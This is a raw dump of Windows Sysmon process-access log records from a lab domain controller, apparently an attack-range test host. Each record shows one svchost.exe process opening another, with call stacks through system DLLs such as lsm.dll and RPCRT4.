13:29:59.060{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010540Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010539Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010538Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010537Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010536Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010535Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.060{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.045{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 